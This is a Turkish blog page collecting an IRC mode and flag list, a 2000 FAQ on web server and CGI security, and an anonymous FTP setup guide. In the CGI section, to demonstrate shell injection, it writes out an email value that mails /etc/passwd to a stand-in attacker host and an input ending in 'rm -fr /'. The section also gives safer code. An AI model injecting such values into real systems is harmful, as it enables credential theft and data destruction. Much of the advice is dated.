| x = Kanal`da renk kullanilamaz

| q = Kanal Sahibi

| l = Kanal`a Sadece O kAdar kisi girebilir

| b = nick!user@host`u Kanaldan Ban`lar..

| k = Kanal`a Girmek icin sifre koyar.

| o = O Nick`e Op Verir

| v = Kisiye Voice verir

| L = Eger +l Modda kanal doluysa `a gonderir

| a = Kullaniciya kanalda Kick Ve Drop Korumasi saglar


IRCop flaglari

| r = /rehash Komutuna Izin Verir

| R = /restart komutuna izin verir

| D = /die |

| o = Lokal IRCop, Ichinde otomatik gelen flaglar: +rhgwlckbBnuf

| O = Global IRCop, Ichinde Otomatik gelen flaglar: +oRDCKN

| A = Oper Yaptiginda +A Alir Server Admin olur

| a = Oper yaptiginda +a Alir Services Komutuna izin verir

| h = /help ops gonderimine izin verir

| g = /globops gonderimine izin verir

| w = /wallops gonderimine izin verir

| l = /localops gonderimine izin verir

| c = Lokal /squits ve /connects e izin verir

| Y = Uzaktaki /squits ve /connects e izin verir

| k = Lokal /kills e izin verir

| K = Global /kills e izin verir

| b = /kline a izin verir

| B = /unkline a izin verir

| n = Lokal Server Notice si gonderebilir(/notice $serveradi mesaj)

| N = Globak Server Notice Gonderebilir(/notice $*.network.net mesaj)

| u = /umode +c ye izin Verir

| f = /umode +f ye izin verir

| N = Oper Yaptiginda +N Alir Network Admin olur

| T = Oper yaptiginda +T Alir Technical Admin Olur

| C = Oper Yaptiginda +C alir ve Yardimci Admin Olur

| z = /zline Eklanmesine Izin verir

0 yorum  

Web Sitesi ve CGI Uygulamalarının Güvenliği

Etiketler: , , Gönderen blogger on zaman: 15:52

Web Sitesi ve CGI Uygulamalarının Güvenliği

Çok karşılaşılan bir durum: sitenizi geliştirirken, veritabanlarından bilgi alma, onlara yazma gibi gereksinimleriniz doğdu. Bunun için de CGI uygulamalarınızı yazdınız. Ve bir gün Web sunucusuna bağlanmaya çalıştığınızda makineye birilerinin girdiğini, "kötü birşeyler" yaptığını farkettiniz.

Bu bir senaryodan çok, sıkça karşılaşılan bir durumdur. Bir bilgisayarın güvenlik riskleri fişi takıldığı andan itibaren başladığı halde, güvenlik hala ihmal edilmektedir. Bunun birkaç sebebini saymak gerekirse:

Yetersiz bilgi

Makinenin kırılamaz olduğunu varsayma

Hiç kimsenin sizin sunucunuzla uğraşmaya tenezzül etmeyeceği düşüncesi

Programları yazarken yeterlice sınamama

Tembellik

Güvenlik deliklerinin başlıca sebepleri:

Bütün bilgisayarların ve programların insan elinden çıktığı düşünülürse, onlara zorla girebilecek başka kişilerin varolması da çok normaldir. Web sunucuları gibi çoklu kullanıcı ve dış dünyaya açık olması zorunlu sistemlerdeyse bu risk katlanmaktadır. Genel olarak bir Web sunucusunun güvenlik açıklarının sebepleri şunlardan bir kısmı veya hepsidir:

Karşı uç

Kullanıcı verileri

Web sunucusu

Web tarayıcısı

CGI, ya da genel olarak sunucu tarafı çalışan programlar ve onların çağırdığı programlar

Karşı uç: Hattı dinleyen, sistemdeki açıkları taratan bir saldırgan da olabilir, virüs gibi sisteme istenmeden yerleşen bir program da.

Kullanıcı verileri: İstemciden aldığınız veriler; bu verileri her ne şekilde işlerseniz işleyin, bir kontrolden geçirmek faydalı olacaktır.

Web sunucusu: Kullanılan Web sunucusunun çeşitli açıkları biliniyor olabilir. Güvenlik sitelerinde araştırma yaparak, kullandığınız sunucu sürümüne özel, ya da eski sürümlerde olup, sizdeki sürümde hala kapatılmamış açıkların bir listesini çıkarmanız faydalı olacaktır.

Web tarayıcısı: 2. maddeyle birleşik düşünülebilir. Güvenliğiniz, kullanıcıdan gelen verileri doğrulamak için istemci tarafı tekniklere (ör. JavaScript'le form doğrulama) dayandırılmamalıdır.

CGI, sunucu tarafı programlar: Web sunucunuz, CGI programlarıyla saldırıya daha açık hale gelebilir, ancak bu her zaman daha güvensiz olacaktır şeklinde de yorumlanmamalıdır.

Sıkça sorulan sorular:

Soru:
Hangi işletim sistemi daha güvenlidir?

Cevap:
Her işletim sisteminin kendine has güvenlik delikleri vardır. Ancak bunların bir kısmı acemi saldırganlara kolay geçit vermezken, bazıları her gelene kapıyı açabilirler. Sitenizi tasarlarken eğer herşeyden önce güvenliği ön plana alıyorsanız, Unix türevi bir işletim sistemi (ancak hepsi değil) kullanmanız yerinde olacaktır. Örneğin, FreeBSD geliştirilirken çok güvenli bir Internet sunucusu olarak tasarlanmıştır. Ancak, Linux, Solaris, HP-UX gibi sistemler de bu iş için çok uygundur. Windows 95/98 gibi son kullanıcıyı hedef alan işletim sistemleriyse asla ciddi bir alternatif olarak görülmemelidir. Windows NT'yse paketten çıktığı haliyle pek güvenli değildir, ve güvenli hale getirilmesi için biraz uğraşılması gerekir.

Soru:
Web sunucusunu root olarak çalıştırmanın yanlış olduğunu duydum, bu doğru mu?

Cevap:
Unix işletim sisteminde 1024'den küçük bir port'u dinlemek için, root erişim haklarına sahip olmak gerekir. Birçok sunucu, ilk açılış esnasında root olarak çalışır, ancak daha sonra 'effective uid'sini çok kısıtlı hakları olan nobody gibi bir kullanıcıya çevirir. Bu haliyle birçok sunucuda (ör. kaynak kodu açık olan Apache'de) bir güvenlik deliği görünmemektedir, ve bu haliyle bu sistem iyi çalışmaktadır. Ancak yine de nobody kullanıcısının sistemi kullanarak e-posta gönderme (sistemdeki /etc/passwd dosyası gibi) gibi hakları vardır. Ancak buradaki sorunun kaynağı kullanıcının kimliği değil, çalıştırılan CGI (genel olarak sunucu tarafı çalışan her tür dil, ASP, Perl, C, PHP vb) uygulamalarıdır denebilir.

Bu soruyla asıl olarak kastedilense, sunucunun çalıştıktan sonra da root uid'sini kullanması, ve örneğin CGI'ların root haklarına sahip olarak çalışmasıdır ki, bu gerçekten açılabilecek en büyük deliklerden biridir.

Windows sistemlerindeyse, sıradan bir kullanıcı bile 80. port'u dinleyebildiği için, IIS (3 ve 4 sürümlerinde) sunucunuzu göçerterek yerine kendi istediği bir programı çalıştırabilir, ve sitenizi ziyaret edenler, Web sayfalarınız yerine saldırganın istediği herhangi bir çıktıyı görebilirler.

Soru:
SSH nedir?

Cevap:
SSH, Secure Shell'in kısaltmasıdır ve şifrelenmiş telnet diyebileceğimiz bir bağlantı sağlar. Bir SSH programıyla karşı tarafa bağlandığınızda, karşı makineyle bir anahtar değişimi yaparsınız. Bu anahtarlarla, karşı tarafa göndereceğiniz bilgiyi şifreleyebilir ancak açamazsınız. Aynı şekilde, karşıdaki makineden size gelen bilgiler de sizin gönderdiğiniz anahtarla şifrelenir, ama yalnız sizin özel anahtarınızla açılabilir. Dolayısıyla, hattı dinleyerek paketleri inceleyen biri olsa bile, giden mesajları çözemeyeceği için iletişim güvenli olacaktır.

Soru:
Chroot ortamı nedir?

Cevap:
Unix sistemlerinde Chroot (Change root) komutuyla Web sunucuyu "güvenli bir kutu" içinde çalıştırabilirsiniz. Chroot ortamında, sunucu Web sayfalarının durduğu dizin dışında, dosya sisteminde hiçbir dizini göremez. Ancak sunucunun bu ortamda çalışabilmesi için de, işletim sisteminin mini bir kopyası bu dizinin içinde durmalıdır. Böyle bir mini işletim sistemi kurmak da gerçekten zordur. Böyle bir ortam kurulduğu zaman ise, CGI programlarının çalıştırılması zorlaşır, çünkü derlenmiş ya da yorumlanan dillerin bu mini işletim sistemine konulması imkansız gibidir. Konulması zorunluysa, chroot ortamı kullanmanın anlamı ortadan kalkacaktır.

Soru:
Sunucunun üstünde zaten çok fazla veri yok. Bir saldırgan girse ne olur ki?

Cevap:
Bir saldırgan yerel ağınıza girdiğinde, ağı dinleyen bir program çalıştırarak (ör. snoop Solaris'lerde hazır olarak gelmektedir), ağ üzerinden şifrelenmemiş olarak giden tüm paketleri dinleyebilir, şifrelerinizi ve hassas verilerinizi öğrenebilir. Bu tip programlara genel olarak sniffer (~koklayıcı) denir ve Internet üzerinde 10'larca türevi vardır.

Ağ üzerindeki sniffer'ları tespit edebilen bazı sistem yönetim programları da vardır. Ancak bunun bir tespit yöntemi de, yoğun trafiği olan ancak kabul edilebilir hızda çalışan bir ağda, sniffer çalıştırıldığı zaman ağ performansın hissedilir olarak düşmesidir.

Her ihtimale karşı yerel ağda bile çalışırken, SSH gibi programlar kullanılmalıdır.

Soru:
Siteme bir ziyaretçi defteri (guestbook), sayaç vb eklemek istiyorum, güvenli midir?

Cevap:
Ziyaretçi defterlerinin çoğu basit programlardır ve birçoğunun hatalar içerdiği bilinmektedir. Bu tip programların hemen hepsi diske yazma, diskten okuma işlemleri yaptığı için potansiyel tehlike arzederler. Ayrıca, HTML kodlarının ayıklanmaması da, sayfanızda istenmeyen görüntüler yaratabilir.

Sayaçlar da benzer şekilde disk üzerinde okuma ve yazma işlemleri yaptıkları için potansiyel tehlikeli sınıfına girerler. Ayrıca, ziyaretçi defterleri de sayaçlar da genel olarak zaten pek işe yaramayan programlardır, ve sitenin kullanım değerini arttırmazlar. Özellikle bedava sayaç veren sitelerden alınanlar da, siteye bağlantı hızını düşürebilirler.

Prensip olarak bilmediğiniz bir programı kullanmaya başlamadan önce, şunları bir gözden geçirin:

Aynı programı kullanan diğer kişilerin tecrübeleri

Programın kaynak kodu elinizdeyse, disk erişimi, ağ erişimi yapıp yapmadığı, ve socket kullanıp kullanmadığı

Kritik değişkenlerin, özellikle de istemci tarafından gelen veri ya da istek dolayısıyla ortama eklenen değişkenlerde buffer overflow (tampon taşması) olup olmayacağı

Programın truva atı çalıştırıp çalıştırmadığı

Programın yetmesi gereken haklardan fazlasını (ör. bir ziyaretçi programı root olarak kurmanızı istiyorsa şüphelenmek gerekir) isteyip istemediği

Soru:
HTML formlarında POST yerine GET kullanmanın daha güvenli olduğunu duydum. Bu nasıl olur?

Cevap:
Aslında burada kastedilen GET'in daha güvenli olduğu değildir. POST metoduyla gönderilen veriler, sunucunun kayıt dosyalarında görünmezken, GET metodunda kayıtlara geçerler. Dolayısıyla CGI'ınıza kuraldışı parametreler göndermeye çalışan saldırganların tüm hareketleri sizde kayıtlı olacaktır.

Soru:
AUP nedir?

Cevap:
Acceptable Use Policy - Kabul edilebilir kullanım politikası. Sistemi kullanan kişilerin, ağ üzerinde nasıl davranmaları gerektiği, hangi tip programları çalıştırabilecekleri, hangilerini çalıştırmamaları gerektiği vb bilgilerin bulunduğu bir belgedir. Mutlaka kullanıcılarınızdan, sisteme girmelerinden önce böyle bir belgeyi kabul ettiklerini onaylamalarını isteyiniz.

Web sunucularında, AUP'nin yeriyse daha çok sitenize içerik hazırlayan kişilerin kabul etmesi amaçlıdır. Web sitenizin durduğu makineyi kullanan kişilere güvenlik politikanızı açıklayan bir belge hazırlayınız.

Soru:
CGI programlarımda neye dikkat etmeliyim?

Cevap:

Asla, asla ve asla, kullanıcıdan aldığınız verileri bir komut satırına parametre olarak bile göndermeyin. Bu maddeyi hiç aklınızdan çıkarmadığınız zaman, en büyük açıklardan birini kapatırsınız.

* 1. maddeyi uygulayamamanız halinde, kabuk metakarakterlerini (shell metacharacters, ör. &;<>|* vb) karakterleri mutlaka kontrol ediniz. Bazı örnekler vermek gerekirse:
*
o Kullanıcının verdiği bir adrese e-posta göndermek için şu Perl kodu yazılmış olsun:

$eadres = &getadres;
open(EPOSTA, "| /var/lib/sendmail $eadres);
print EPOSTA, "To: $eadres\nFrom: ulakbim@ulakbim.gov.tr\n\n
Teşekkürler\n";
close EPOSTA;
Bu durumda bir saldırgan, şu şekilde bir e-posta adresi vererek makinenizdeki şifre dosyasını ele geçirebilir:
hickimse@hicbiryer; mail saldirgan@kotu.yer < /etc/passwd
Daha iyi bir yol şu olabilir:

$eadres = &getadres;
open(EPOSTA, "| /var/lib/sendmail -t);
print EPOSTA< To: $eadres
From: ulakbim@ulakbim.gov.tr
Subject: Teşekkürler
...
POSTASONU
close EPOSTA;
o Bir başka örnek vermek gerekirse, kullanıcıdan aldığınız kelimeleri sıralamanız gerekiyor ve şu Perl kodu kullanılmış:

system "/bin/sort < &veri_al";

Bu satır, Perl'in bir kabuk açarak, sort programını çağırmasını sağlar. Ancak, veri_al fonksiyonundan gelen verilerde verilecek metakarakterler kabuk tarafından işleme konacaktır: ör. "1 3 2>/dev/null; rm -fr /" (saldırgan dosyaları CGI'ın çalıştığı kullanıcı olarak silebilir de silemeyebilir de, ancak deneyebileceği ilk şey olabilir). Bunun yerine daha iyi bir yöntem şudur:

system "/bin/sort", &veri_al;

Bu yöntemde, Perl bir kabuk açmadan parametreleri doğrudan işletim sistemine gönderir ve dolayısıyla metakarakterler bir sorun olmazlar.
* Yine kullanıcıdan aldığınız verileri, parametre olarak göndermek zorundaysanız, aldığınız veriyi beklediğiniz veriyle karşılaştırın. Bu karşılaştırma işleminde, istenmedik karakterleri atmak yerine (ki istenmeyen çok geniş bir kavramdır), tam olarak istediğiniz veriyle karşılaştırma yapın.
o Örneğin, kullanıcıdan bir e-posta adresi bekliyorsanız şu kodu kullanabilirsiniz:

$eposta = &veri_al;
die "Verdiğiniz adres isim@kurum.com biçiminde değil"
unless (
$eposta =~ /^[\w.+-]+\@[\w.+-]+$/;
# bu regexp sadece eposta adreslerini eşler
* Bu durumları uyarmanın bir yöntemi de, Perl'de bulunan tainting (lekelemek) mekanizmasını kullanmaktır. Bunu yapmak için CGI programınızın başına "#!/usr/bin/perl -T" gibi bir satır eklemelisiniz. -T seçeneğini verdiğiniz zaman Perl, tainted (programın dışından alınan, ör. ortamdan alınan, standart girdiden ya da komut satırından alınan) değişkenleri system(), exec(), (|'la kullanırsanız) open() ve eval() komutlarında kullanmanıza izin vermez. Ayrıca tainted değişkenlerden türettiğiniz bütün değişkenler de otomatik olarak tainted olurlar. Tainted bir değişkeni untainted (lekelenmemiş) bir değişken haline ancak Perl'ün karakter eşleme metodlarından biriyle, ör. =~, çevirebilirsiniz.
* Özellikle, yorumlanan dillerle yazdığınız CGI'larda çağırdığınız programların dizinlerini açık olarak veriniz, ör. ls yerine /bin/ls gibi.
* CGI programlarınızı tamamen yetkisiz bir kullanıcı hesabında çalıştırınız, ör. nobody. Bu şekilde CGI'ınızdaki bir hata nedeniyle, saldırganlar CGI'ın çalıştığı hesaba erişim hakkı kazansa bile, sisteme hemen zarar veremez.
* Perl kullanıyorsanız, cgi-lib.pm gibi güvenilirliğini kanıtlamış bir modül kullanınız. Not: PHP, klasik anlamda CGI (harici çalıştırılabilir şeklinde, ör. /usr/local/bin/php gibi fiziksel bir program) olarak şu an için pek sağlıklı çalışmasa da, Apache modülü olarak (ör. mod_php.so vb) gayet iyi çalışmakta, ve Perl'de hazır gelmeyen CGI işlevlerini hazır olarak sunmaktadır.
* Siteniz CGI programları tarafından üretiliyorsa, CGI programlarınızın gelişmiş hata kontrolleri yaptığından ve bunların kayıtlarını tuttuğundan emin olun. Mümkünse bu program, kayıtlarını otomatik olarak e-postayla başka bir makinedeki sistem yöneticisine göndermelidir.

Soru:
Makineyi kırılması imkansız hale nasıl getirebilirim?

Cevap:
Makinenizi kapalı tutunuz. Kırılması imkansız bir sistem yoktur.

Soru:
Özel olarak Apache için neler yapabilirim?

Cevap:

Apache, genel olarak güvenli bir sunucudur, ancak yanlış ayarları sunucunun farketmesi ve sizi uyarması imkansızdır. Yine de bazı ayarları değiştirerek sistemi daha da güvenli yapabilirsiniz.

* Öncelikle sembolik link'lerin takibini (Option FollowSymLinks) kapatınız (bir yolu "Option SymLinksIfOwnerMatch" demektir). Bu her ne kadar sunucunun performasını düşürse de, sistemdeki bir kullanıcı gizlice bir dizinden /etc gibi kritik bir dizine sembolik link verebilir.
* Ayrıca, dizinlerin otomatik listelenmesini (Option Indexes) iptal edebilirsiniz (Option None). Bir saldırgan sisteminizde bulunan yedek dosyalarını, kendinize kolaylık amacıyla oluşturduğunuz ama silmeyi unuttuğunuz sembolik bağları, geçici oluşturulan dosyaları, CVS dosyalarını, sitenizin iç yapısını göremezse, içeri girmesi de zor olur.
* Sunucu hakkında bilgi almak için kullanılan, /server-info ve /server-status programcıklarını sadece IP adreslerine erişilir kılmalısınız.
* Harici bir modül olan mod_disallow_id'yle (Apache sitesinde contributed modules altında bulabilirsiniz) belli kullanıcılara, ör. root, sys, daemon veya bin'e dosyaların Web sunucu tarafından hiç okunamamasını, dolayısıyla çalıştırılmamasını da sağlayabilirsiniz.
* Son olarak da, CGI programlarınızı mutlaka merkezi bir yerde tutunuz ve bu dizine yazma hakkını kısıtlayınız. İşleri kolaylaştırıyor görünen .cgi uzantılı dosyaları nerede görürsen gör çalıştır seçeneğini aktif (yani: AddHandler cgi-script .cgi) hale getirmeyiniz.
* Apache'yi suExec özelliğini kullanacak şekilde derleyebilirsiniz. suExec, CGI programlarını Web sunucunun çalıştığı hesaptan başka bir hesapta da çalıştırabilir, ör. Web sunucunuzu nobody, CGI programlarini cgiuser gibi bir hesapta çalıştırabilirsiniz.
* Apache'yle birlikte gelen CGI script'lerinin (ör. printenv) ismini değiştiriniz ya da çalıştırma hakkını iptal ediniz.

Soru:
Firewall nedir?

Cevap:
Bir firewall programı, yerel ağla dış dünyayı birbirinden soyutlayarak, iki taraf arasındaki trafiği kısıtlayabilir. Örneğin, firewall'ın içinden (yerel ağ) dışarıya FTP izni verebilir, ama dışarıdan (dünya) içeriye FTP yapılmasını engelleyebilirsiniz. Bir firewall kurmak, güvenliği sağlamanın en temel adımlarından biridir. Firewall'unuzu kurduktan sonra, sistem yöneticisi, kullanılması zorunlu port'lar (örneğin, Web için 80, FTP için 21, SSH için 22 vb) dışında her port'u dış dünyaya kapatmalıdır.

Soru:
Peki, Web sitemi firewall'un içine mi dışına mı koymalıyım?

Cevap:
Aslında tersi durum da tercih edilebilmesine rağmen, iyi bir çözüm dışına koymaktır. Bu durumda, sunucu firewall'un koruduğu dışarıdan her türlü saldırıya açık olacaktır, ancak sunucuya zorla girilmesi halinde, saldırganlar firewall'un içine girmemiş olacaklardır (sunucunun firewall içinde kalması durumunda, saldırganlar firewall'u aştıkları için yerel ağ üzerinde - büyük ihtimalle - rahatça dolaşacaklardır). Böyle bir kurulum tercih edildiği takdirde (sunucu bir nevi 'kurbanlık koyun' gibi olacaktır) unutulmaması gereken birkaç husus da şunlardır:

* Sunucunun root/admin şifresini başka hiçbir makinede kullandığınız root şifresiyle aynı yapmayınız. Sunucunuza zorla giren kişiler, aynı şifreyi diğer makinelerde de deneyeceklerdir.
* Benzer şekilde, sunucuda başka kullanıcı hesapları açacaksanız, iç sitenizde kullanılmayan şifreler belirleyerek, bunların değiştirilmemesini, hatta mümkünse erişimin bir paketleyici (wrapper, ör. Web tabanlı bir erişim programı) tarafından yapılarak, bu şifrenin iç kullanıcılar tarafından bile öğrenilmemesini sağlayın.
* Veritabanı kopyalama (replication), dizin senkronizasyonu gibi işlemleri sunucudan firewall içine bir trafikle değil, firewall içinden sunucuya doğru bir trafikle yapınız.
* Mümkünse firewall içinden sunucuya paylaştırdığınız dizinlere sadece okuma izni veriniz.

Soru:
Aynı makinede hem Web hem de FTP servislerini çalıştırıyoruz. FTP ve Web servislerinin kök dizinlerini aynı yapmak bir güvenlik açığı getirir mi?

Cevap:
Bu sık yapılan bir uygulamadır, ve uzaktan yüklenen dosyalar doğrudan çalıştırılmadığı sürece herhangi bir sorun olmaz. Ancak, bir saldırgan uzaktan yüklediği bir CGI programını çalıştırabilirse, sisteminize zarar verebilir. Böyle bir makinede, uzaktan yüklenen dosyaları okunur yapmamalısınız. Birçok FTP sitesindeki "incoming" dizini yazmaya açık, listeleme ve okumaya kapalıdır. Siz de bu yolu tercih etmelisiniz.

Soru:
Sunucuya birisinin girdiğini farkettik, ne yapmalıyız?

Cevap:
Öncelikle paniğe kapılmayın ve sakın makineyi bir anda kapatmayın. Önce saldırganın o anda ne yapmakta olduğunu tespit etmeye çalışın ve sanki haberiniz yokmuş gibi davranın. Bu arada root hesabında çalışıyorsanız, tanımadığınız komutları yanlışlıkla da olsa çalıştırmamak için, sisteme normal bir kullanıcı olarak girin. Bu programlar root haklarında çalışırsa, kendi elinizle sisteme zarar vermiş olursunuz. Makinedeki önemli kayıt dosyalarının (syslog, sulog vb) ve listelerin (last|more>last.out, ps-ef>ps.out vb) hemen bir kopyasını e-posta, scp gibi bir yöntemle başka bir makineye atın.

Makinenizi tek kullanıcı modunda (single user mode, genellikle "init s" gibi bir komutla) açın. Öncelikle sisteme en son eklenen, ya da değiştirilen dosyaların listesini çıkartın ve setuid biti açık programlara ya da yukarıda aldığınız kayıtlardan bu programların aldığı dosya parametrelerine bakınız. Kullanıcının sisteme girdiği IP adresini kayıtlardan bulmaya çalışarak, makinenin kaynağı olan yeri bulmanız da işe yarayabilir. Bu şekilde, karşı tarafın sistem yöneticisine bir e-posta atarak durumu bildirebilirsiniz. Ayrıca kayıtları inceleyerek olağan olmayan durumları araştırınız. Birçok saldırgan, bir programa belli parametreler göndererek, onu önce şişmeye zorlarlar (genellikle buffer overflow şeklinde olur) sonra da makineye root erişimi kazanırlar. Bu şekilde bir program bulursanız, o servisi önce iptal ediniz, daha sonra başka bir makineden Internet'e bağlanarak saldırganın kullandığı metodları tespit etmeye çalışınız. Saldırganın kullandığı metodu bulursanız, bu açıkları kapatmanız da daha kolay olacaktır. Sisteminizde bir hasar tespit edebilirseniz, yedeklerinizden sistemi eski haline getiriniz. Daha sonra sunucuyu dış dünyaya tekrar açmadan önce, yedeklediğiniz dosyalardaki (ör. CGI programları, yanlış ayarlar) hataları da düzeltmeyi unutmayınız.

Not: Yukarıda bahsedilen yöntem, sistem yöneticisinden yöneticiye değişebilir. Bu sadece örnek bir uygulamadır ve fikir vermek amacıyla yazılmıştır.

Soru:
Başka neler yapabilirim?

Cevap:
Aşağıdaki maddelerin uygulanması, güvenlik deliklerini kapatmamakla beraber, bir felaket durumunda sistemin kurtarılmasını, sorumlunun bulunmasını, ya da olası güvenlik problemleri olan servislerin iptal edilmesini sağlarlar.

* Öncelikle, sistemin dönüşümlü yedeğini alınız. Bir göçme durumunda yedekler çok işinize yarayacaktır. Firewall olan bir ortamda, yedekleri içerideki bir makineden, dışarıdaki sunucuya güvenli bir yolla (Unix NFS ve Windows File Sharing çok güvenli metodlar değildir, özelleşmiş metodlar, örneğin tar/scp ikilisi, daha güvenli olabilir) bağlanarak alınız. Tersini (dışarıdaki Web sunucusundan içerideki bir makinenin diskine yazmaya çalışarak) asla yapmayınız.
* Web sunucunuzu mümkünse, başka servislerin çalışmadığı, üzerinde kullanıcıların tanımlanmadığı bir makineye taşıyınız.
* Yerel ağınızda bir SSH paketi kullanınız. Bu programlarla yerel ağ üzerinden akan tüm trafik kırılması yüzyıllar alacak şekilde şifrelenmektedir. SSH'ın avantajı, Web sunucunuza bağlanmak zorunda kalan kişilerin, makineye gizlice girmiş bir saldırgana şifrelerini kolayca kaptırmamalarını sağlar.
* Web sunucunuzda, grafik arabirim (Unix'deki Window Manager kavramı) vb gereksiz özellikleri kapatınız (Windows'da bu mümkün değildir). Ayrıca makine üzerindeki tüm gereksiz servisleri kapatınız. Örneğin, Unix'de RPC, NFS server, finger, rlogin gibi servislerin güvenlik delikleri bilinmektedir. Hatta, sendmail, inetd gibi programları daha güvenli "olan" qmail, xinetd gibi programlarla değiştiriniz. Not: Windows 2000'de bu iş imkansız gibidir.
* Makinenize gelen tüm servis isteklerinin bir kaydını alınız. Örneğin tcp wrapper programı (xinetd içinde bu destek de vardır) bu işi çok iyi yapmaktadırlar.
* Web sunucunuzun kayıtlarını düzenli olarak inceleyiniz, ve hatta bir kayıt analiz programı kullanabilirsiniz. Mümkünse bu kayıtları da düzenli olarak yedekleyiniz.
* Makinenize DoS (Denial of Service) saldırılarını engelleyiniz. DoS, bir saldırının adı değil, bir saldırı biçimidir, ve birden çok yöntemi vardır. Örneğin ping paketleriyle bombardıman yaparak makinenin dış dünyaya cevap veremez hale getirilmesi ya da Web sunucusundan 10000 karakterden oluşan bir adres istenerek sunucunun kilitlenmesi, DoS saldırılarıdır. Yapılan saldırının türüne göre farklı önlemler vardır.
* Güvenli bir Web sunucusu için SSH ve HTTP servisleri yetmektedir. Geri kalan tüm servisler ekstra ihtiyaçlarınız için açılmaktadır, ancak bir sitenin vermesi gereken minimum servisi etkilemezler.
* Şifrelerinizi düzenli olarak değiştiriniz. Bu yolla, şifreniz bir kere öğrenilmiş bile olsa, öğrenen kişi bu şifreyi sisteminize girmek için tekrar kullanamaz. Ayrıca, kritik makinelerinizin şifrelerini asla aynı yapmayınız, herbiri için ayrı şifreler kullanınız.
* Ağ monitörleme ve sniffer programlarını tespit eden programları kullanınız.
* Genel olarak saldırganlar, bir makineye girdikten sonra, tekrar girebilmeleri için kendilerinin bildiği açık kapılar bırakırlar. Sistemde çalıştıracağınız bir programla, sistemdeki kritik yerlerdeki (örneğin /sbin, /etc, /usr/local vb) dosyaların tarihlerinin değişip değişmediğini, eklenen/silinen programların ve dosyaların listesini, ya da dosyaların içindeki değişiklikleri kontrol etmelisiniz. Bu tip programlara genel olarak intrusion detection programları adı verilir
* Server Side Include (Sunucu tarafı ekleme) kullanıyorsanız, Exec komutunu kapatınız. Apache için bunu istediğiniz yerler için Option IncludesNoExec yönergesiyle yapabilirsiniz.
* CGI programlarınıza bir paketleyici yazarak, CGI'larınızı önce ona havale eder ve alt CGI'ları onun üstünden çağırabilirsiniz. Bunun iki avantajı vardır:
o Alt programlara gerekli bilgileri devretmeden önce bir güvenlik kontrolü yapabilirsiniz.
o Alt programlarda, kendisini çağırması gereken program olarak paketleyici programı gösterirseniz, saldırganlarınızın sitenize (bir şekilde) yüklediği bir programı rastgele bir biçimde çalıştırmasını engelleyebilirsiniz.
Bu metodun bir benzerini kullanan çeşitli CGI wrapper'lar mevcuttur, ör. yukarıda da bahsedilen Apache suExec, ya da cgiwrap, sbox paketleyicileri.

Ayrıca bakınız:

CGI Uygulamaları

Cüneyt YILMAZ (cu@ulakbim.gov.tr)
20 Haziran 2000

0 yorum  

Halka Acik (anonymous) FTP Dosya Sunucusu Kurulumu

Etiketler: , , Gönderen blogger on zaman: 15:51

Halka Acik (anonymous) FTP Dosya Sunucusu Kurulumu

Halka acik (anonymous) FTP dosya sunucusu kurmak


Red-Hat Linux gibi bir cok bilgisayar yazilimi internet uzerinden ucretsiz indirilebilir.Bunun basarilmasini saglayan yapi "halka acik ftp sunucularinin" uzerine kurulmustur.


Her dosya alis-verisi yapmak isteyen kisiye bir FTP hesabi acmak pratikte mumkun degildir.Ancak bu sekilde yapilandirilmis bir FTP sunucusu ile tum dunyaya acik bir dagitim merkezi kurulunabilir…


"Halka Acik FTP Sunuculari" bilgisayar korsanlari icin en buyuk nimettir.Bir sunucuya yanlizca gerekli oldugunda boyle bir ozellik eklenmelidir.Ihtiyacimiz oldugu varsayilarak asagidaki kurulum yazisi harilanmistir :


Red Hat Linux isletim sistemi ile hic zorlanilmadan ve ucretsiz olarak boyle bir FTP sunucusu kurmak icin anonftp RPM paketi kullanilir.


Hemen bu isimde bir paketin sistemde yuklu olup olmadigina bakalim :



rpm -qa | grep anonftp



Eger sunucunuzda bu paket yuklu ise surum numarasi ile beraber ekrana gelecektir.


herhangi bir cikti ekrana yazilmaz ise program sisteminizde yok demektir. Red Hat Cd-Rom'undan bu paketi asagidaki gibi yukleyebilirsiniz :



rpm -ivh anonftp-3.0-6.i386.rpm



Sisteminizin mimarisi ve CD-Rom'daki paketin surum numarasina gore yukaridaki komutu kendinize gore duzenlemeniz gereklidir.(Ornegin i386 pentium mimarisine sahip sistemler icindir.)


Bu paket bir kez kurulduktan sonra "Halka acik FTP sunucusu" calismaya hazirdir.


Onemli Not : Sisteminizde "ftp" isimli kullanici hesabi herhangi bir sifre verilmemis olarak hazir olmalidir. /etc/passwd dosyasi icinde "ftp" kullanci adina sahip hesap icin :



ftp:*:14:50:FTP User:/home/ftp:/bin/true


sekinde bir kayit olup olmadigini kontrol ediniz…



Kurulumun nasil yapildigini gormek istiyorsaniz sagidaki gibi bir komutu calistirabilirsiniz :



rpm -qlp anonftp-3.0-6.i386.rpm



Su anda kurulumla ilgili dosyalari goruyor olmalisiniz.Butun dosyalar ~ftp klasorune yerlestirilir.(Bu klasor 'ftp' kullanicisi icin ev klasorudur.Bunun ne oldugunu gormek icin /etc/passwd dosyasina bakilmalidir.)


Bulundugunuz klasoru ~ftp olacak sekilde degistirin ve "ls -l" komutunu calistirin.




[serkan@ns1 ~ftp]# ls -l
total 4
d-x-x-x 2 root root 1024 Nov 5 15:29 bin
d-x-x-x 2 root root 1024 Nov 5 15:29 etc
drwxr--xr--x 2 root root 1024 Nov 5 15:29 lib
dr--xr--sr--x 2 root ftp 1024 Sep 10 17:21 pub



seklinde bir ekran ciktisi goreceksiniz.simdi bin klasorune gecerek ls -l komutunu bu klasorde calsitriniz :




[serkan@ns1 ~ftp/bin]# ls -l
total 313
---x-x-x 1 root root 15236 Nov 5 15:29 compress
---x-x-x 1 root root 46356 Nov 5 15:29 cpio
---x-x-x 1 root root 45436 Nov 5 15:29 gzip
---x-x-x 1 root root 29980 Nov 5 15:29 ls
---x-x-x 1 root root 62660 Nov 5 15:29 sh
---x-x-x 1 root root 110668 Nov 5 15:29 tar




Bu hizmet yazilimlari FTP sunucusunda olmasi gereken yazilimlardir. Ornegin ls programi klasorlerin icerigini goruntulemek icin kullanilir.Peki bu yazilimlar neden burada duruyorlar?


Cevap cok basit : Biz "halka acik sunucu kurarken" ~ftp klasorunu (/home/ftp) "chroot" programiyla sunucu icin kok klasor haline getiriyoruz.Bu durumda sunucunun diger klasorlerine erisim mumkun olmamaktadir.


Kullanicinin halka acik bu sunucuya baglanmasi halinde bazi hizmet yazilimlarini (ornegin ls gibi) kulanmasi sarttir.Bunlari /bin klasorune yerlestirip problemi cozmus oluyoruz…


